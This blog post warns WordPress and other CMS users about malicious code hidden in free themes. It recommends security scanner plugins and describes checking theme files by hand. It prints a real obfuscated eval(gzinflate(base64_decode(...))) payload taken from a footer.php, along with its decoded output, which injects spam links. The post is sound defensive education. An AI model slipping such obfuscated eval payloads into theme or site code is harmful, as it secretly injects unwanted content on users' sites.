Web
Analytics Made Easy - StatCounter


This warning not only pertains to WordPress, but all Content Management Systems (CMS) that use themes or templates. It includes Drupal, Joomla, and other popular Content Management Systems as well.

Everybody loves free things, but sometimes a wrong theme may be providing the user more than they bargained for.
How about headaches, this beautiful looking theme could end up producing spam bots, redirect visits to another site, or placing ads on your website without your permission.

When I refer to free themes, I am alluding to themes you find after performing a blind Google search: “free wordpress themes.”
If you really want to use free themes, you can find excellent themes in the WordPress Theme Directory.
Free themes from the WordPress Directory are wonderful, they are pre-inspected and certified for safe use.
To access these themes:

  • Inside your WordPress Dashboard:
  • On the left menu, hover over Appearance.
  • A menu appears, click on Themes.
  • Once inside the Themes page, look in the upper left hand corner for button: Add New and click.
  • A grid of themes appears, in which you can filter the type of theme you are looking for.

Let me clarify something, not all free themes outside of the WordPress Directory are corrupt.
There are some sites that do provide legitimate and safe themes.
So you may ask, how can I be sure what is a clean coded theme?

First, install the theme on your site, but dont’t activate it.
Next install Theme Authenticity Checker (TAC) from the WordPress Plugin Directory, it’s free.
Just follow the steps in the Theme’s page after this plugin is activated.

Side note: Some premium themes may display warnings when tested.
If you look at the warnings, it is not for malicious code.
The reason is that many of these themes were never intended to be added to the WordPress Theme Directory, so they were not written to pass the WordPress.org requirements or standards.

Another plugin that can check for malicious code is Sucuri Malware and Security Scanner
This free plugin is also found in the WordPress Plugin Directory.

How about WP Antivirus Site Protection
“This plugin will be especially useful for everybody who downloads WP themes and plugins from torrents and websites with free stuff instead of purchase the original copies from the developers. You will be shocked, how many free gifts they have inside”

A very popular Security plugin, Wordfence is free and also found in the plugin directory.
“Scans core files, themes and plugins against WordPress.org repository versions to check their integrity. Verify security of your source.”

There are more, but the plugins listed above can get you started in protecting your website.

Checking Theme Files Manually
This process can be a bit tedious, and not for the faint in heart.
Something a developer might take the time to pursue and investigate.
1) If a theme is red flagged during a test, you may want to find out where the malicious code is located, and how it is injected into the files.
2) Manually open the theme files by unzipping the folder. Normally the malicious code can be found in the following files:

  • footer.php
  • header.php
  • functions.php

Actually, unwanted code could be in other files, but normally I have found them in these three files.
 

Sample
Here is a actual sample of malicious code found in the footer.php file inside of a free theme.
This theme was not from the WordPress Theme Directory.
footer.php file:

<!--?php eval(gzinflate(base64_decode("ZZHPTsMwDMbPnbR3sHJYNmm00naDND0AJ26UCyeUtW5TkTZV4tFN4oV4DZ6M/hnatMkX258/+Sc7kSKvviAzyvuYFdYSOibnsyAIboUPOhCTi8y2RxAKtMMiZhGTIml1Cztjy6op7JI3qka+eoBEikhJWMMT+qpsMIfdhVETtfdR1HVd6AmVIe2RqGpKH2a2ZkAVGYxZOmmQnkQmrzvDkjX8/oBIzhAwUUCPgZm2wIGHuSJc8vcJDb7hTWONkI9wl2j8As3sD3t3bJUz1g1c0edmu3XKk/IYaqoNly94qgeQEMTO9Qecz84XSgrEPHbeb5h8bshVODLD8jVNV7CA68l+TY0N+bvJ8ngqzx4R9b8Zv/SfDfEH"))); ?-->

 

I have seen enough php code, to recognize that this is not your normal footer php file.
This is a suspicious concealed code, and it was checked in Virustotal, which did verify it is malicious.
 


 

Results of the test:
 


 

So lets decrypt this code:
De-obfuscation this code using UnPHP.net
Results of the decoded script shown below:
 

<!--?php ?--><div class="footer">
<div class="footer_txt">© <a href="/"><!--?php bloginfo('name'); ?--></a> , Designed by <a href="http://www.stealthsettings.com" title="Stealth Settings">Stealth Settings</a>,  <!--? bloginfo( 'name' ); echo ' '.date('Y'); ?--> | Theme design by <a href="http://www.luxuryparlor.com/k233rastase.html">Kerastase</a>. <br>

<a href="/?feed=rss2">Entries</a> (RSS) &amp; <a href="/?feed=comments-rss2">Comments</a> (RSS)</div>
</div>

 
As you can see, strange ads are now posted in your footer, linked to foreign websites.
If you noticed, a encoding scheme Base64 is used to “hide” the actual malicious code
within the obfuscation code.

I am not familiar with how this malicious code is initiated, one possible method is the

eval()

Function.
 

Read more about: Eval
Caution
“The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use thus is discouraged. If you have carefully verified that there is no other option than to use this construct, pay special attention not to pass any user provided data into it without properly validating it beforehand.” (PHP.net)
 

More resources on Base64 code.

Conclusion:
“Precaution is better than cure.” Edward Coke
Enough said, here are a few recommended sites to procure free and safe WordPress themes:
 
The best and safest source to find free themes is WordPress.org theme directory.
There are countless number of themes, something in every category, and more added daily.
For those who want to venture out of the box, here are a few sites that you can check out:

The old saying, “You get what you pay for.”
Sometimes it might actually be a cost savings if you pay a little, to have a theme that works without any frustrations down the road.

Hope this post shares some light on free themes.
There some good ones out there, it’s just finding them.


Gerald Watanabe
Islandwebtek

Share This